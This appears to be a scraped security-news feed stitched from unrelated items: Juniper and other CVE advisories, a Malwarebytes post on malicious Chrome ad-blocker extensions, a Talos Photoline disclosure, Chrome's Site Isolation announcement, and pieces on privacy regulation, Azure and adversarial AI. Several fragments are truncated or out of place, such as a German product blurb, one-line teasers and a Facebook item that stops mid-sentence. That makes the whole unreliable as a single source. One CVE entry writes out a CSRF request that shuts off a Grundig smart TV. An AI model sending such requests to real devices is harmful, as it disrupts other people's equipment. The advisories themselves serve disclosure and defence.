QFX5200 and QFX10002 devices that have been shipped with Junos OS 15.1X53-D21, 15.1X53-D30, 15.1X53-D31, 15.1X53-D32, 15.1X53-D33 and 15.1X53-D60 or have been upgraded to these releases using the .bin or .iso images may contain an unintended additional Open Network Install Environment (ONIE) partition. This additional partition allows the superuser to reboot to the ONIE partition which will wipe out the content of the Junos partition and its configuration. Once rebooted, the ONIE partition will not have root password configured, thus any user can access the console or SSH, using an IP address acquired from DHCP, as root without password. Once the device has been shipped or upgraded with the ONIE partition installed, the issue will persist. Simply upgrading to higher release via the CLI will not resolve the issue. No other Juniper Networks products or platforms are affected by this issue.

CVE-2018-0038

Juniper Networks Contrail Service Orchestration releases prior to 3.3.0 have Cassandra service enabled by default with hardcoded credentials. These credentials allow network based attackers unauthorized access to information stored in Cassandra.

CVE-2018-0027

Receipt of a crafted or malformed RSVP PATH message may cause the routing protocol daemon (RPD) to hang or crash. When RPD is unavailable, routing updates cannot be processed which can lead to an extended network outage. If RSVP is not enabled on an interface, then the issue cannot be triggered via that interface. This issue only affects Juniper Networks Junos OS 16.1 versions prior to 16.1R3. This issue does not affect Junos releases prior to 16.1R1.

CVE-2018-0024

An Improper Privilege Management vulnerability in a shell session of Juniper Networks Junos OS allows an authenticated unprivileged attacker to gain full control of the system. Affected releases are Juniper Networks Junos OS: 12.1X46 versions prior to 12.1X46-D45 on SRX Series; 12.3X48 versions prior to 12.3X48-D20 on SRX Series; 12.3 versions prior to 12.3R11 on EX Series; 14.1X53 versions prior to 14.1X53-D30 on EX2200/VC, EX3200, EX3300/VC, EX4200, EX4300, EX4550/VC, EX4600, EX6200, EX8200/VC (XRE), QFX3500, QFX3600, QFX5100;; 15.1X49 versions prior to 15.1X49-D20 on SRX Series.

CVE-2018-0034

A Denial of Service vulnerability exists in the Juniper Networks Junos OS JDHCPD daemon which allows an attacker to core the JDHCPD daemon by sending a crafted IPv6 packet to the system. This issue is limited to systems which receives IPv6 DHCP packets on a system configured for DHCP processing using the JDHCPD daemon. This issue does not affect IPv4 DHCP packet processing. Affected releases are Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S10 on EX Series; 12.3X48 versions prior to 12.3X48-D70 on SRX Series; 14.1X53 versions prior to 14.1X53-D47 on EX2200/VC, EX3200, EX3300/VC, EX4200, EX4300, EX4550/VC, EX4600, EX6200, EX8200/VC (XRE), QFX3500, QFX3600, QFX5100; 14.1X53 versions prior to 14.1X53-D130 on QFabric; 15.1 versions prior to 15.1R4-S9, 15.1R6-S6, 15.1R7; 15.1X49 versions prior to 15.1X49-D140 on SRX Series; 15.1X53 versions prior to 15.1X53-D67 on QFX10000 Series; 15.1X53 versions prior to 15.1X53-D233 on QFX5110, QFX5200; 15.1X53 versions prior to 15.1X53-D471 on NFX 150, NFX 250; 16.1 versions prior to 16.1R3-S9, 16.1R4-S8, 16.1R5-S4, 16.1R6-S3, 16.1R7; 16.2 versions prior to 16.2R2-S5, 16.2R3; 17.1 versions prior to 17.1R1-S7, 17.1R2-S7, 17.1R3; 17.2 versions prior to 17.2R1-S6, 17.2R2-S4, 17.2R3; 17.3 versions prior to 17.3R1-S4, 17.3R2-S2, 17.3R3; 17.4 versions prior to 17.4R1-S3, 17.4R2.

CVE-2018-0039

Juniper Networks Contrail Service Orchestration releases prior to 4.0.0 have Grafana service enabled by default with hardcoded credentials. These credentials allow network based attackers unauthorized access to information stored in Grafana or exploit other weaknesses or vulnerabilities in Grafana.

CVE-2018-0032

The receipt of a crafted BGP UPDATE can lead to a routing process daemon (RPD) crash and restart. Repeated receipt of the same crafted BGP UPDATE can result in an extended denial of service condition for the device. This issue only affects the specific versions of Junos OS listed within this advisory. Earlier releases are unaffected by this vulnerability. This crafted BGP UPDATE does not propagate to other BGP peers. Affected releases are Juniper Networks Junos OS: 16.1X65 versions prior to 16.1X65-D47; 17.2X75 versions prior to 17.2X75-D91, 17.2X75-D110; 17.3 versions prior to 17.3R1-S4, 17.3R2; 17.4 versions prior to 17.4R1-S3, 17.4R2.

CVE-2018-0031

Receipt of specially crafted UDP/IP packets over MPLS may be able to bypass a stateless firewall filter. The crafted UDP packets must be encapsulated and meet a very specific packet format to be classified in a way that bypasses IP firewall filter rules. The packets themselves do not cause a service interruption (e.g. RPD crash), but receipt of a high rate of UDP packets may be able to contribute to a denial of service attack. This issue only affects processing of transit UDP/IP packets over MPLS, received on an interface with MPLS enabled. TCP packet processing and non-MPLS encapsulated UDP packet processing are unaffected by this issue. Affected releases are Juniper Networks Junos OS: 12.1X46 versions prior to 12.1X46-D76; 12.3 versions prior to 12.3R12-S10; 12.3X48 versions prior to 12.3X48-D66, 12.3X48-D70; 14.1X53 versions prior to 14.1X53-D47; 15.1 versions prior to 15.1F6-S10, 15.1R4-S9, 15.1R6-S6, 15.1R7; 15.1X49 versions prior to 15.1X49-D131, 15.1X49-D140; 15.1X53 versions prior to 15.1X53-D59 on EX2300/EX3400; 15.1X53 versions prior to 15.1X53-D67 on QFX10K; 15.1X53 versions prior to 15.1X53-D233 on QFX5200/QFX5110; 15.1X53 versions prior to 15.1X53-D471, 15.1X53-D490 on NFX; 16.1 versions prior to 16.1R3-S8, 16.1R4-S9, 16.1R5-S4, 16.1R6-S3, 16.1R7; 16.2 versions prior to 16.2R1-S6, 16.2R2-S5, 16.2R3; 17.1 versions prior to 17.1R1-S7, 17.1R2-S7, 17.1R3; 17.2 versions prior to 17.2R1-S6, 17.2R2-S4, 17.2R3; 17.2X75 versions prior to 17.2X75-D100; 17.3 versions prior to 17.3R1-S4, 17.3R2-S2, 17.3R3; 17.4 versions prior to 17.4R1-S3, 17.4R2; 18.1 versions prior to 18.1R2; 18.2X75 versions prior to 18.2X75-D5.

CVE-2018-0037

Junos OS routing protocol daemon (RPD) process may crash and restart or may lead to remote code execution while processing specific BGP NOTIFICATION messages. By continuously sending crafted BGP NOTIFICATION messages, an attacker can repeatedly crash the RPD process causing a sustained Denial of Service. Due to design improvements, this issue does not affect Junos OS 16.1R1, and all subsequent releases. This issue only affects the receiving BGP device and is non-transitive in nature. Affected releases are Juniper Networks Junos OS: 15.1F5 versions starting from 15.1F5-S7 and all subsequent releases; 15.1F6 versions starting from 15.1F6-S3 and later releases prior to 15.1F6-S10; 15.1F7 versions 15.1 versions starting from 15.1R5 and later releases, including the Service Releases based on 15.1R5 and on 15.1R6 prior to 15.1R6-S6 and 15.1R7;

We block shady ad blockers

Some of you have reached out to us concerning Malwarebytes blocking of certain ad blocking extensions, or an influx in web blocking notifications. First things first, this is not a false positive. Recently in their blog, AdGuard has discovered that numerous malicious ad blocking extensions were found in the Google Chrome store. According to an article by ZDNet, the malicious extensions have since been removed from the store. However, 20 million devices are estimated to have downloaded these apps while they were still online. You might own one of those devices.

The extensions are used to basically turn the browser into a zombie under the control of a remote attacker, essentially adding your device to a botnet. Since we are limited in our ability to remove extensions completely, we are blocking the domains the malicious extensions reach out to, so at the very least, users will not have their systems controlled by a cybercriminal.

If you are consistently getting pop-ups, you may want to investigate if you are running one of the malicious extensions we are talking about here. Here is a full list:

  • uBlock Plus
  • Adblock Pro
  • HD for YouTube™
  • Webutation

If so, your best option is to remove it from your browser.

Check out our guide on Adware, that includes a section on extension removal.

Take a look at the names of some of these “extensions.” Notice anything? Adblock Pro, uBlock, YouTube—all big names and buzzwords that make these extensions seem more legitimate. Add in the fact that fake comments and reviews are created all the time for these types of tools and, at the end of the day, the criminal is counting on your ability to not realize this is not the app you are looking for.

Please be mindful of what you install in your browser and, overall, on your computer. Just like those cheap DVDs you might find at the shop, who have titles so incredibly similar to a big blockbuster film, that folks who aren’t as familiar with the source material overlook the fact that they are buying a knock-off. Think of this the same way with extensions, plugins, and add-ons for your browsers. There are some really great ones out there, but there are a lot of shady copycats.

Be sure to check user reviews, download numbers, and even outside recommendations (searching for “best ad blocker” might be a good place to start). Doing so will help make sure you’ve installed the right tool that will do the best job.

Thanks for reading, safe surfing, see you next time!

The post We block shady ad blockers appeared first on Malwarebytes Labs.

Vulnerability Spotlight: Computerinsel Photoline Multiple Vulnerabilities

Vulnerabilities discovered by Tyler Bohan from Talos

Overview


Today, Cisco Talos is disclosing several vulnerabilities in Computerinsel Photoline. Photoline is an image-processing tool used to modify and edit images, as well as other graphic-related material. This product has a sizable user base and is popular in the graphic design field. The vulnerabilities are present in the parsing functionality of the software.

TALOS-2018-0585 - Computerinsel Photoline PSD-Blending Channel Code Execution Vulnerability (CVE-2018-3921)


A memory corruption vulnerability exists in the Adobe Photoshop file (PSD)-parsing functionality of Computerinsel Photoline 20.54. A specially crafted PSD document processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a PSD document to trigger this vulnerability and gain code execution. Detailed vulnerability information can be found here.

TALOS-2018-0586 - Computerinsel Photoline ANI-Parsing Code Execution Vulnerability (CVE-2018-3922)


A memory corruption vulnerability exists in the ANI-parsing functionality of Computerinsel Photoline 20.54. A specially crafted ANI image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver an ANI image to trigger this vulnerability and gain code execution. Detailed vulnerability information can be found here.

TALOS-2018-0587 - Computerinsel Photoline PCX Run Length Encoding Code Execution Vulnerability (CVE-2018-3923)


A memory corruption vulnerability exists in the PCX-parsing functionality of Computerinsel Photoline 20.54. A specially crafted PCX image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a PCX image to trigger this vulnerability and gain code execution. Detailed vulnerability information can be found here.

Tested Versions:


Computerinsel Photoline 20.54 for OS X

https://3.bp.blogspot.com/-_gx-CKXcM6s/W0UVE0O4z4I/AAAAAAAADNk/teef_5aO8I4kCho5FRErk5-UUdZIHCM9ACK4BGAYYCw/s1600/patch_availability_available.jpg

Coverage

The following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 46452-46453, 46455-46456, 46459-46460

Breaking ground: Understanding and identifying hidden tunnels

It’s me again – Cognito. As always, I’ve been hard at work with Vectra to automate cyberattack detection and threat hunting. Recently, we made an alarming discovery: hackers are using hidden tunnels to break into and steal from financial services firms!

Clearly, this is serious business if it involves bad guys targeting massive amounts of money and private information. But what exactly are we dealing with? Let’s dig into what hidden tunnels are and how I find them to uncover the answer.

Datentransparenz

Datentransparenz

Digital Guardian ermöglicht Ihnen, den Standort von vertraulichen Daten, den Datenfluss innerhalb des Unternehmens sowie Situationen zu ermitteln, in denen Daten einem Risiko ausgesetzt sind – all das, bevor offizielle Richtlinien erstellt werden.

Ask Sucuri: How Do You Find Website Backdoors?

Ask Sucuri: How Do You Find Website Backdoors?

In a previous post, we have explained what website backdoors are and what they look like. Today, we want to focus on ways that we identify and remove backdoors to prevent reinfection.

Techniques to Find Backdoors

Finding a website backdoor is not an easy task because the main function of a backdoor is to keep it hidden from the website owner. However, at Sucuri we recommend the following techniques:

Whitelisting

We know what good files look like.

Continue reading Ask Sucuri: How Do You Find Website Backdoors? at Sucuri Blog.

Protecting Your Data

Even if you don’t have a Facebook account, you have undoubtedly heard the reports about how Cambridge Analytica accessed the personally identifiable information (PII) of up to 87 million users over a period of several years.

Be Strong

Looking at examples of how municipalities or governments protect these assets can help businesses plan as well. Critical infrastructure for businesses often shares similar needs with municipalities: how do we best protect servers, structures and the people who live and work in private buildings?

Keeping Your House Secure

Conversations about what can be done to keep violent weapons and dangerous materials from falling into the wrong hands continue to dominate the political discussion, leaving communities wondering about what they can do to prevent the next school or church attack.

Key Considerations

Having both specific and shared goals is what makes medical centers quite unique to security. Rarely are two buildings alike, yet they all have common needs, requirements and goals.

CVE-2018-10231

Cross-site scripting (XSS) vulnerability in TOPdesk before 8.05.017 (June 2018 version) and before 5.7.SR9 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.

CVE-2018-10635

In Universal Robots Robot Controllers Version CB 3.1, SW Version 3.4.5-100, ports 30001/TCP to 30003/TCP listen for arbitrary URScript code and execute the code. This enables a remote attacker who has access to the ports to remotely execute code that may allow root access to be obtained.

CVE-2018-10232

Cross-site request forgery (CSRF) vulnerability in TOPdesk before 8.05.017 (June 2018 version) and before 5.7.SR9 allows remote attackers to hijack the authentication of authenticated users for requests that can obtain sensitive information via unspecified vectors.

USB the Hard Way

Apple made it trickier for anyone looking to download the contents of an iOS device this week with a new feature that prevents USB accessories from communicating with devices that haven't been unlocked in an hour.

Trusted Identities

As with all major sporting and entertainment events, the goal is for everyone using a ticket to have purchased it from the authorized ticketing entity and to have a seamless experience both when they pick it up and when they present it at the venue.

Common Technology Problems That Can Negatively Affect Productivity Levels

According to a recent report by the U.S. Bureau of Labor Statistics, worker productivity levels are on a steady decline.

Generally, lower productivity levels signify a need for change within a company. Failing to notice these warning signs can lead to a business losing a lot of money.

Often times, technology is one of the most common issues that leads to lower productivity levels. Utilizing the power of programs like a Kanban board is essential when trying to keep employees in the loop and projects progressing along.

The following are some of the most common technology problems that can negatively affect your company’s productivity levels.

Failing to Provide Office Technology With Proper Maintenance

Many business owners abide by the “it will never happen to me” philosophy when it comes to technology problems. In order to keep things like an office computer network functional and reliable, a business owner will have to hire professionals to maintain it.

Investing in things like network monitoring can be very helpful when attempting to find out about technology-related issues early on. Once this monitoring catches problems with the technology a business is using, IT professionals will swoop in and fix it.

Without the proper care, the business network you use on a daily basis will always be on the verge of crashing. Having a widespread network outage will lead to a lot of lost productivity and can affect your bottom line in a negative way.

Improper Technology Integration Can Cause Major Problems

If you are like most business owners, you are passionate about staying on the cutting edge of technology. Adding new software and hardware to your existing computer network isn’t as easy as you may think.

Improperly integrating new elements into a business computer network can cause major instability. Rather than trying to handle this complicated process alone, you need to think about working with seasoned IT professionals.

Before installing new hardware and software on a network, IT professionals will ensure it is compatible. There will be instances when the computer network your company uses has to be updated in order to support a new program. Not only can updating the network make the implementation of new software and hardware easier, it can fix security holes that may exist as well.

Slow and Unstable Technology Can Frustrate Employees

In order to get the most out of your employees each day, you will have to provide them with state-of-the-art technology. Letting the technology used in your office get outdated is a recipe for disaster.

When the computer network in an office runs slowly, it leads to declining productivity levels and makes employees very frustrated. Rather than making employees “just deal” with this problem, you need to find a solution quickly.

Even if you have to invest a good deal of money in updating your existing network, it will be well worth it. Before making a decision on what type of upgrades you need to make, be sure to consult with a knowledgeable IT company. In most cases, these professionals will have no problem helping you find and implement new technology in a hurry.

Fix Your Tech Problems Now!

Are you tired of losing money due to technology-related productivity issues? The only way to address these problems is by reaching out for some professional help. With the guidance of an IT professional, you should be able to find the right tools to make your job a lot easier.

The post Common Technology Problems That Can Negatively Affect Productivity Levels appeared first on TechWorm.

CVE-2018-3936

In Antenna House Office Server Document Converter version V6.1 Pro MR2 for Linux64 (6,1,2018,0312), a crafted Microsoft Word (DOC) document can lead to an out-of-bounds write, resulting in remote code execution.

CVE-2018-10197

There is a time-based blind SQL injection vulnerability in the Access Manager component before 9.18.040 and 10.x before 10.18.040 in ELO ELOenterprise 9 and 10 and ELOprofessional 9 and 10 that makes it possible to read all database content. The vulnerability exists in the ticket HTTP GET parameter. For example, one can succeed in reading the password hash of the administrator user in the "userdata" table from the "eloam" database.

CVE-2018-3932

An exploitable stack-based buffer overflow exists in the Microsoft Word document conversion functionality of the Antenna House Office Server Document Converter version V6.1 Pro MR2 for Linux64 (6,1,2018,0312). A crafted Microsoft Word (DOC) document can lead to a stack-based buffer overflow, resulting in remote code execution.

CVE-2018-3931

In Antenna House Office Server Document Converter version V6.1 Pro MR2 for Linux64 (6,1,2018,0312), a crafted Microsoft Word (DOC) document can lead to an out-of-bounds write, resulting in remote code execution. This vulnerability occurs in the `putShapeProperty` method.

CVE-2018-3930

In Antenna House Office Server Document Converter version V6.1 Pro MR2 for Linux64 (6,1,2018,0312), a crafted Microsoft Word (DOC) document can lead to an out-of-bounds write, resulting in remote code execution. This vulnerability occurs in the `vbgetfp` method.

CVE-2018-13989

Grundig Smart Inter@ctive TV 3.0 devices allow CSRF attacks via a POST request to TCP port 8085 containing a predictable ID value, as demonstrated by a /sendrcpackage?keyid=-2544&keysymbol=-4081 request to shut off the device.

CVE-2018-3929

An exploitable heap corruption exists in the PowerPoint document conversion functionality of the Antenna House Office Server Document Converter version V6.1 Pro MR2 for Linux64 (6,1,2018,0312). A crafted PowerPoint (PPT) document can lead to heap corruption, resulting in remote code execution.

CVE-2013-2951

IBM WebSphere Portal 7.0.0.x and 8.0.0.x write passwords to a trace file when tracing is enabled for the Selfcare Portlet (Profile Management), which allows local users to obtain sensitive information by reading the file. IBM X-Force ID: 83621.

CVE-2018-11529

VideoLAN VLC media player 2.2.x is prone to a use after free vulnerability which an attacker can leverage to execute arbitrary code via crafted MKV files. Failed exploit attempts will likely result in denial of service conditions.

CVE-2013-0592

Cross-site scripting (XSS) vulnerability in IBM iNotes before 8.5.3 Fix Pack 6 and 9.x before 9.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM X-Force ID: 83815.

CVE-2017-16709

Crestron Airmedia AM-100 devices with firmware before 1.6.0 and AM-101 devices with firmware before 2.7.0 allows remote authenticated administrators to execute arbitrary code via unspecified vectors.

CVE-2013-0594

Open redirect vulnerability in IBM iNotes before 8.5.3 Fix Pack 6 and 9.x before 9.0.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. IBM X-Force ID: 83383.

CVE-2017-16710

Cross-site scripting (XSS) vulnerability in Crestron Airmedia AM-100 devices with firmware before 1.6.0 and AM-101 devices with firmware before 2.7.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2013-0589

IBM iNotes before 8.5.3 Fix Pack 6 and 9.x before 9.0.1 allows remote attackers to bypass the remote image filtering mechanism and obtain sensitive information via a crafted e-mail message. IBM X-Force ID: 83371.

CVE-2018-3933

An exploitable out-of-bounds write exists in the Microsoft Word document conversion functionality of the Antenna House Office Server Document Converter version V6.1 Pro MR2 for Linux64 (6,1,2018,0312). A crafted Microsoft Word (DOC) document can lead to an out-of-bounds write, resulting in remote code execution. This vulnerability occurs in the `vbputanld` method.

Mitigating Spectre with Site Isolation in Chrome



Speculative execution side-channel attacks like Spectre are a newly discovered security risk for web browsers. A website could use such attacks to steal data or login information from other websites that are open in the browser. To better mitigate these attacks, we're excited to announce that Chrome 67 has enabled a security feature called Site Isolation on Windows, Mac, Linux, and Chrome OS. Site Isolation has been optionally available as an experimental enterprise policy since Chrome 63, but many known issues have been resolved since then, making it practical to enable by default for all desktop Chrome users.

This launch is one phase of our overall Site Isolation project. Stay tuned for additional security updates that will mitigate attacks beyond Spectre (e.g., attacks from fully compromised renderer processes).

What is Spectre?

In January, Google Project Zero disclosed a set of speculative execution side-channel attacks that became publicly known as Spectre and Meltdown. An additional variant of Spectre was disclosed in May. These attacks use the speculative execution features of most CPUs to access parts of memory that should be off-limits to a piece of code, and then use timing attacks to discover the values stored in that memory. Effectively, this means that untrustworthy code may be able to read any memory in its process's address space.

This is particularly relevant for web browsers, since browsers run potentially malicious JavaScript code from multiple websites, often in the same process. In theory, a website could use such an attack to steal information from other websites, violating the Same Origin Policy. All major browsers have already deployed some mitigations for Spectre, including reducing timer granularity and changing their JavaScript compilers to make the attacks less likely to succeed. However, we believe the most effective mitigation is offered by approaches like Site Isolation, which try to avoid having data worth stealing in the same process, even if a Spectre attack occurs.

What is Site Isolation?

Site Isolation is a large change to Chrome's architecture that limits each renderer process to documents from a single site. As a result, Chrome can rely on the operating system to prevent attacks between processes, and thus, between sites. Note that Chrome uses a specific definition of "site" that includes just the scheme and registered domain. Thus, https://google.co.uk would be a site, and subdomains like https://maps.google.co.uk would stay in the same process.

Chrome has always had a multi-process architecture where different tabs could use different renderer processes. A given tab could even switch processes when navigating to a new site in some cases. However, it was still possible for an attacker's page to share a process with a victim's page. For example, cross-site iframes and cross-site pop-ups typically stayed in the same process as the page that created them. This would allow a successful Spectre attack to read data (e.g., cookies, passwords, etc.) belonging to other frames or pop-ups in its process.

When Site Isolation is enabled, each renderer process contains documents from at most one site. This means all navigations to cross-site documents cause a tab to switch processes. It also means all cross-site iframes are put into a different process than their parent frame, using "out-of-process iframes." Splitting a single page across multiple processes is a major change to how Chrome works, and the Chrome Security team has been pursuing this for several years, independently of Spectre. The first uses of out-of-process iframes shipped last year to improve the Chrome extension security model.
A single page may now be split across multiple renderer processes using out-of-process iframes.

Even when each renderer process is limited to documents from a single site, there is still a risk that an attacker's page could access and leak information from cross-site URLs by requesting them as subresources, such as images or scripts. Web browsers generally allow pages to embed images and scripts from any site. However, a page could try to request an HTML or JSON URL with sensitive data as if it were an image or script. This would normally fail to render and not expose the data to the page, but that data would still end up inside the renderer process where a Spectre attack might access it. To mitigate this, Site Isolation includes a feature called Cross-Origin Read Blocking (CORB), which is now part of the Fetch spec. CORB tries to transparently block cross-site HTML, XML, and JSON responses from the renderer process, with almost no impact to compatibility. To get the most protection from Site Isolation and CORB, web developers should check that their resources are served with the right MIME type and with the nosniff response header.

Site Isolation is a significant change to Chrome's behavior under the hood, but it generally shouldn't cause visible changes for most users or web developers (beyond a few known issues). It simply offers more protection between websites behind the scenes. Site Isolation does cause Chrome to create more renderer processes, which comes with performance tradeoffs: on the plus side, each renderer process is smaller, shorter-lived, and has less contention internally, but there is about a 10-13% total memory overhead in real workloads due to the larger number of processes. Our team continues to work hard to optimize this behavior to keep Chrome both fast and secure.

How does Site Isolation help?

In Chrome 67, Site Isolation has been enabled for 99% of users on Windows, Mac, Linux, and Chrome OS. (Given the large scope of this change, we are keeping a 1% holdback for now to monitor and improve performance.) This means that even if a Spectre attack were to occur in a malicious web page, data from other websites would generally not be loaded into the same process, and so there would be much less data available to the attacker. This significantly reduces the threat posed by Spectre.

Because of this, we are planning to re-enable precise timers and features like SharedArrayBuffer (which can be used as a precise timer) for desktop.

What additional work is in progress?

We're now investigating how to extend Site Isolation coverage to Chrome for Android, where there are additional known issues. Experimental enterprise policies for enabling Site Isolation will be available in Chrome 68 for Android, and it can be enabled manually on Android using chrome://flags/#enable-site-per-process.

We're also working on additional security checks in the browser process, which will let Site Isolation mitigate not just Spectre attacks but also attacks from fully compromised renderer processes. These additional enforcements will let us reach the original motivating goals for Site Isolation, where Chrome can effectively treat the entire renderer process as untrusted. Stay tuned for an update about these enforcements! Finally, other major browser vendors are finding related ways to defend against Spectre by better isolating sites. We are collaborating with them and are happy to see the progress across the web ecosystem.

Help improve Site Isolation!

We offer cash rewards to researchers who submit security bugs through the Chrome Vulnerability Reward Program. For a limited time, security bugs affecting Site Isolation may be eligible for higher rewards levels, up to twice the usual amount for information disclosure bugs. Find out more about Chrome New Feature Special Rewards.

How Local Privacy Regulations Influence CISO Spending Around the World

As local privacy regulations take effect in places like California and the U.K., security leaders around the world are sensing a shift toward stronger data privacy and transparency — and are using these laws as guidelines to help them make budgetary decisions.

The California Consumer Privacy Act was signed into law on June 28, 2018, and will take effect by 2020. The law will take an approach similar to the General Data Protection Regulation (GDPR) regarding transparency and consent around personal information. GDPR went into effect across the European Union (EU) just one month before the new law’s signing.

Like other privacy regulations, organizations in California must now ensure their customers know what kind of information they are collecting and sharing with third parties, such as advertisers and marketers. Consumers can choose to opt out of having their information collected, and companies that fail to comply risk incurring fines from the state’s attorney general.

Local Privacy Regulations Guide Private Sector Security Strategies

While GDPR and the California Consumer Privacy Act focus on how companies gather and manage data, other legislators are trying to ensure that the systems they use don’t fall prey to cybercriminals.

The U.K.’s Cabinet Office, for instance, published the first iteration of its “Minimum Cyber Security Standard” in June 2018. Though designed as a checklist for government agencies, organizations can adopt some of its practices in the private sector — such as checking websites and applications for common vulnerabilities — to keep ahead of further privacy legislation. As with more traditional privacy regulations, it outlines several mandatory requirements, including support for Transport Layer Security (TLS) encryption.

Regulatory Activity Impacts Security Budgets Around the World

These new laws and regulations reveal that chief information security officers (CISOs) from California to the U.K. are starting to use privacy regulations as a guide to determine what resources they will need to be effective.

For instance, according to a February 2018 report from consulting group Ankura, The Shifting Cybersecurity Landscape: How CISOs and Security Leaders Are Managing Evolving Global Risks to Safeguard Data, 73 percent of CISOs said regulatory activity drives their decision-making around security budgets — and all respondents said they had to comply with at least one such framework.

Even if privacy regulations like GDPR don’t directly pertain to their organizations, the Ankura report suggested that security leaders are paying close attention because they recognize that one piece of legislation can influence what other governments may demand in the future.

In other words: The effects of cybersecurity legislation in places like the E.U., the U.K. and California are reaching far past their own borders. As data privacy laws proliferate around the world, security leaders everywhere will be impacted by the shift toward greater protection and transparency.

The post How Local Privacy Regulations Influence CISO Spending Around the World appeared first on Security Intelligence.

Facebook Faces £500,000 Fine in U.K. Over Cambridge Analytica Leak

Facebook has been fined £500,000 ($664,000) in the U.K. after the country's data protection watchdog concluded that its data-sharing scandal broke the law, making it as the social network's first fine over the Cambridge Analytica scandal. Yes, £500,000—that's the maximum fine allowed by the UK's Data Protection Act 1998, and equals to what Facebook earns every 8 minutes. Facebook has been

P = NP: Cloud data protection in vulnerable non-production environments

Data is the holy grail of your cloud workloads for attackers. Data breaches are the kind of breaches that make the news. With the recent European Union General Data Protection Regulations (GDPR), they will make even bigger headlines. From an enterprise point of view, the most challenging aspect of protecting data is knowing what it is and where it resides. Only when these two questions are answered can you drive data protection via organizational policies.

Most of your sensitive data is collected in production environmentsthe environments you know that you need to protect, and you usually do. But this is only part of the story. Even though best practices mandate that sensitive information be scrubbed before it transits in the organization, this cannot be ensured. It stands in contradiction to the growing adoption and improvements of the shift-left testing concept, as well as other business needs.

Shift-left testing is the movement of testing to earlier stages in the development lifecycle. Mature testing in early stages is appreciated as it helps developers find problems earlier and in a more cost-effective manner. It also helps quality assurance teams to reproduce bugs in the system and accelerates the debugging processes.

There are other business needs for pulling data to non-production environments. In the research and analytics space, data scientists and analysts prefer to use real data to do their research effectively, whether to offer models that improve the production systems, to perform forensic and log analysis, or to bring insight to product, strategy, and marketing teams, to name a few. In the customer service space, helpdesk personnel may need to pull sensitive records to allow them to perform their jobs efficiently.

For these purposes and others, production data is being pulled not only to the staging environment, but also to development and test environments, as well as research and analytics environments. Data may even reach personal or team playgrounds. Oftentimes, the reality is that organizations disperse data across various environments, making it hard to keep track of what and where.

The following schematic depicts the flow of code from development environments to staging and production environments, along with the flow of production data back to staging, development, and research environments to allow for mature testing and business improvement at earlier stages. The latter flow may even continue to leak outside the organizations IT.

From a security point of view, the data pull should be protected, and sensitive data should not be present in a non-production environment. Synthetic fake data generation should be applied when possible, and format-preserving masking should be applied when data needs to be more realistic. However, not using real data will always impose some loss of data properties and, in turn, the data will always lack some characteristics that may be crucial for testing, and certainly for research. Therefore, to enable advanced testing at earlier stages and allow for better analytics, real data will keep being pulled out of production environments, and the associated risk will be spread throughout the organizations data stores.

To address this risk, applying perimeter solutions is a good start. But if this is your answer to the risk, then you should think again! Are you sure that once an attacker gets a hold of your sensitive data, he cannot evade detection? Are you sure that you have no malicious insiders? What is a perimeter in the cloud?

Lets take a step back and rethink the basics of what is needed from a data protection solution: beyond basic security requirements, such as role-based access control, multifactor authentication, setting up firewalls, and encrypting data at rest and data in transit, advanced threat protection should be deployed. This comprises of:

  1. Visibility on where your sensitive data resides, what type of sensitive data it is, and who is accessing this data and how.
  2. Understanding the vulnerabilities of your data stores and being able to fix them.
  3. Detecting the threats and attempts made to infiltrate your data stores.

Any subset of these capabilities is going to leave weak spots in your organizations posture. For instance, if you have visibility regarding the whereabouts of sensitive data, but no knowledge of the vulnerabilities of your databases, can you be sure that any attempt to infiltrate/exfiltrate your database is detected? Test environments are commonly targeted for data breaches where real data is used for testing and development purposes, like the recent example of Shutterfly.

In addition, if you have a vulnerability in a non-production resource, most likely it exists in similar production resources as well. Finding this out gives a great deal of leverage in reconnaissance terms to attackers. They can probe and investigate non-production environments to find weak spots, then apply them to production environments, minimizing their contact with your production environments, and minimizing the probability of being caught by your threat detection solutionsin case the latter is only deployed on your production environments.

This establishes the following imperative: data protection must be an organization-wide solution, not only a production environment deployment! Hence, P = NP.

From a cloud workload protection perspective, you should build a vision of how to protect your data resources that considers your IT, DevOps, and research methodologies, as well as your data stewardship practices. Deriving a roadmap for this vision requires a solution that allows you to discover your organizations data resources, including any resources in your shadow IT infrastructure. The outcome of this methodic processwhether its manual, semi-automated, or fully automatedshould be a mapping of your data estate across all sorts of environments and an associated risk statement with each resource. This evaluation gives you a metric and can be used as a compass to secure your organization. The resources that were deemed eligible for advanced security should then be continuously monitored with advanced threat prevention solutions that keep you alerted with the vulnerabilities of your resources, the sensitivity of your data, and a real-time threat detection capability. Therefore, when we are asked by customers whether they should protect their non-production environments, our answer is: P = NP!

Azure Security Center is a great built-in tool with Azure that can help you protect all your environments. It helps you assess the security state of your cloud resources, both production and non-production environments and provides advanced threat protection against evolving threats. You can start a free trial for Azure and the Security Center, or if youre already using Azure, just open the Security Center blade to start using it today.

Are Machine Learning and Adversarial AI the New Insider Threats?

Machine learning and artificial intelligence (AI) are transitioning from proof-of-concept programs to functional corporate infrastructure. As spending on these technologies continues to drastically rise, their expanding prevalence is all but inevitable.

But the adoption of digital intelligence introduces new risk: IT experts face a steep slope of adaptations while cybercriminals look for ways to compromise new tools.

Could adversarial AI become the newest insider threat?

Why AI Won’t Replace Human Expertise

Security teams are overworked and understaffed, but some still worry that AI tools will eventually replace human expertise. In response to these concerns, Phys.org noted in June 2018 that discussions about artificial intelligence and automation are “dominated by either doomsayers who fear robots will supplant humans in the workforce or optimists who think there’s nothing new under the sun.”

New research, however, suggests that these technologies are better suited to replace specific tasks within jobs rather than wiping out occupations en masse. As reported by The Verge in June 2018, a pilot plan by the U.S. Army will leverage machine learning to better predict when vehicles need repair — taking some of the pressure off of human technicians while reducing total cost.

The same is possible in IT security: Using intelligent tools for the heavy lifting of maintenance and data collection and freeing up technology professionals for other tasks.

